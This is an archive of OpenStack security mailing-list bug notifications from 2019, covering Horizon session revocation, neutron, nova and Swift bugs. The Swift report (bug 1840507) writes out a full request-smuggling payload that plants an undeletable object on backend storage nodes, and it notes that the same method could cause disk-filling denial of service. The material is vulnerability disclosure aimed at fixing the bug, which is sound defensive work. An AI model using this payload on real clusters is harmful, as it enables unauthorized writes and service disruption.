this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1842930 at bugs.launchpad.net Thu Sep 19 15:14:03 2019 From: 1842930 at bugs.launchpad.net (Akihiro Motoki) Date: Thu, 19 Sep 2019 15:14:03 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156890604348.463.17364479639664631010.malone@wampee.canonical.com> I am adding keystone to the affected projects as I failed to find a good pointer on this behavior in the keystone documentation. If there is a good point in keystone already, it would be appreciated. I will refer to it in the horizon doc. ** Also affects: keystone Importance: Undecided Status: New ** Changed in: horizon Assignee: (unassigned) => Akihiro Motoki (amotoki) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1842930 at bugs.launchpad.net Thu Sep 19 16:21:45 2019 From: 1842930 at bugs.launchpad.net (Arthur Nikolayev) Date: Thu, 19 Sep 2019 16:21:45 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156891010554.5182.3058739384646853867.malone@chaenomeles.canonical.com> Akihiro, thank you for detailed explanation. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1842930 at bugs.launchpad.net Thu Sep 19 16:26:40 2019 From: 1842930 at bugs.launchpad.net (Matthias Runge) Date: Thu, 19 Sep 2019 16:26:40 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156891040037.425.13951429236988176056.malone@wampee.canonical.com> The same behaviour should be reproducible via command line client. This issue is inherent if you use tokens, which are valid for some time, and services only validate the token itself, but not (via keystone), if the token has become invalid. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1840895 at bugs.launchpad.net Thu Sep 19 16:37:42 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 19 Sep 2019 16:37:42 -0000 Subject: [Openstack-security] [Bug 1840895] Re: segment parameter check failed when creating network References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156891106306.27303.12910831266593178843.malone@soybean.canonical.com> Reviewed: https://review.opendev.org/682558 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=f050abab45daeb91443797b6c82a31eb06885a68 Submitter: Zuul Branch: stable/rocky commit f050abab45daeb91443797b6c82a31eb06885a68 Author: Slawek Kaplonski Date: Fri Aug 30 22:32:19 2019 +0200 Fix creation of vlan network with segmentation_id set to 0 In case when vlan network was created with segmentation_id=0 and without physical_network given, it was passing validation of provider segment and first available segmentation_id was choosen for network. Problem was that in such case all available segmentation ids where allocated and no other vlan network could be created later. This patch fixes validation of segmentation_id when it is set to value 0. Change-Id: Ic768deb84d544db832367f9a4b84a92729eee620 Closes-bug: #1840895 (cherry picked from commit f01f3ae5dd0dd7dd9aa513a1b50e04e20a08b97b) ** Tags added: in-stable-rocky ** Tags added: in-stable-queens -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Thu Sep 19 16:37:54 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 19 Sep 2019 16:37:54 -0000 Subject: [Openstack-security] [Bug 1840895] Fix merged to neutron (stable/queens) References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156891107439.5297.5015689445379343363.malone@chaenomeles.canonical.com> Reviewed: https://review.opendev.org/682559 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=17f3b75007643e8329eb93194d2e9597be3b90fb Submitter: Zuul Branch: stable/queens commit 17f3b75007643e8329eb93194d2e9597be3b90fb Author: Slawek Kaplonski Date: Fri Aug 30 22:32:19 2019 +0200 Fix creation of vlan network with segmentation_id set to 0 In case when vlan network was created with segmentation_id=0 and without physical_network given, it was passing validation of provider segment and first available segmentation_id was choosen for network. Problem was that in such case all available segmentation ids where allocated and no other vlan network could be created later. This patch fixes validation of segmentation_id when it is set to value 0. Change-Id: Ic768deb84d544db832367f9a4b84a92729eee620 Closes-bug: #1840895 (cherry picked from commit f01f3ae5dd0dd7dd9aa513a1b50e04e20a08b97b) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From fungi at yuggoth.org Thu Sep 19 23:08:01 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 19 Sep 2019 23:08:01 -0000 Subject: [Openstack-security] [Bug 1840507] Re: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <156893448210.27343.13963351501122096991.malone@soybean.canonical.com> Yes, it does get a little weird since the bug in question appeared in a release only on the master branch of a project which maintains stable branches as well. There would be no guarantee of a means for distributors of 2.22.0 to backport a clean fix, though I suppose that could still be possible depending on how much they care about the related unit test issue. Regardless, since Python 3 support in 2.22.0 was marked as experimental, that means we could similarly consider it covered by class B3 in our report taxonomy as well. As this plan has the consent of both the original reporter and the Swift PTL (being one and the same person), I won't delay further in switching it to public. Thanks, Tim! ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): New Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From 1840895 at bugs.launchpad.net Fri Sep 20 09:35:06 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 20 Sep 2019 09:35:06 -0000 Subject: [Openstack-security] [Bug 1840895] Re: segment parameter check failed when creating network References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156897210615.812.14867274112697842049.malone@wampee.canonical.com> Reviewed: https://review.opendev.org/682557 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=7156ebfc2853ceeeeb94b7a4f9046eeb256051c1 Submitter: Zuul Branch: stable/stein commit 7156ebfc2853ceeeeb94b7a4f9046eeb256051c1 Author: Slawek Kaplonski Date: Fri Aug 30 22:32:19 2019 +0200 Fix creation of vlan network with segmentation_id set to 0 In case when vlan network was created with segmentation_id=0 and without physical_network given, it was passing validation of provider segment and first available segmentation_id was choosen for network. Problem was that in such case all available segmentation ids where allocated and no other vlan network could be created later. This patch fixes validation of segmentation_id when it is set to value 0. Change-Id: Ic768deb84d544db832367f9a4b84a92729eee620 Closes-bug: #1840895 (cherry picked from commit f01f3ae5dd0dd7dd9aa513a1b50e04e20a08b97b) ** Tags added: in-stable-stein -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From morgan.fainberg at gmail.com Mon Sep 23 17:26:12 2019 From: morgan.fainberg at gmail.com (Morgan Fainberg) Date: Mon, 23 Sep 2019 17:26:12 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156925957297.13161.5652308264070002939.malone@gac.canonical.com> Added Keystonemiddleware and documentation tags. Marked as "medium" importance as it requires documentation changes but is not critical/RC/otherwise impacting. Clear communication of expected behavior is important and should be found in Horizon and Keystonemiddleware's documentation. I am marking invalid for Keystone itself as keystone will invalidate it's internal cache (barring cases such as in-memory [not production quality] dict-base cache). ** Tags added: documentation ** Also affects: keystonemiddleware Importance: Undecided Status: New ** Changed in: keystone Status: New => Confirmed ** Changed in: keystonemiddleware Status: New => Triaged ** Changed in: keystone Status: Confirmed => Triaged ** Changed in: keystone Importance: Undecided => Medium ** Changed in: keystonemiddleware Importance: Undecided => Medium ** Changed in: keystone Status: Triaged => Invalid -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): Invalid Status in keystonemiddleware: Triaged Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1823104 at bugs.launchpad.net Fri Sep 27 09:04:57 2019 From: 1823104 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 27 Sep 2019 09:04:57 -0000 Subject: [Openstack-security] [Bug 1823104] Fix included in openstack/nova 20.0.0.0rc1 References: <155434268658.20433.7202128545677329084.malonedeb@chaenomeles.canonical.com> Message-ID: <156957509759.31709.13013970358786613602.malone@soybean.canonical.com> This issue was fixed in the openstack/nova 20.0.0.0rc1 release candidate. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1823104 Title: CellMappingPayload in select_destinations versioned notification sends sensitive database_connection and transport_url information Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) stein series: Fix Committed Bug description: As of this change in Stein: https://review.openstack.org/#/c/508506/28/nova/notifications/objects/request_spec.py at 334 Which is not yet officially released, but is in the 19.0.0.0rc1, the select_destinations versioned notification payload during a move operation (resize, cold/live migrate, unshelve, evacuate) will send the cell database_connection URL and MQ transport_url information which contains credentials to connect directly to the cell DB and MQ, which even though notifications are meant to be internal within openstack services, seems like a pretty bad idea. IOW, just because it's internal to openstack doesn't mean nova needs to give ceilometer the keys to it's cell databases. There seems to be no justification in the change for *why* this information was needed in the notification payload, it seemed to be added simply for completeness. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1823104/+subscriptions From 1816727 at bugs.launchpad.net Fri Sep 27 09:05:25 2019 From: 1816727 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 27 Sep 2019 09:05:25 -0000 Subject: [Openstack-security] [Bug 1816727] Fix included in openstack/nova 20.0.0.0rc1 References: <155065649227.28374.17032096910895521610.malonedeb@chaenomeles.canonical.com> Message-ID: <156957512535.6829.9989353975740825835.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/nova 20.0.0.0rc1 release candidate. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816727 Title: nova-novncproxy does not handle TCP RST cleanly when using SSL Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] 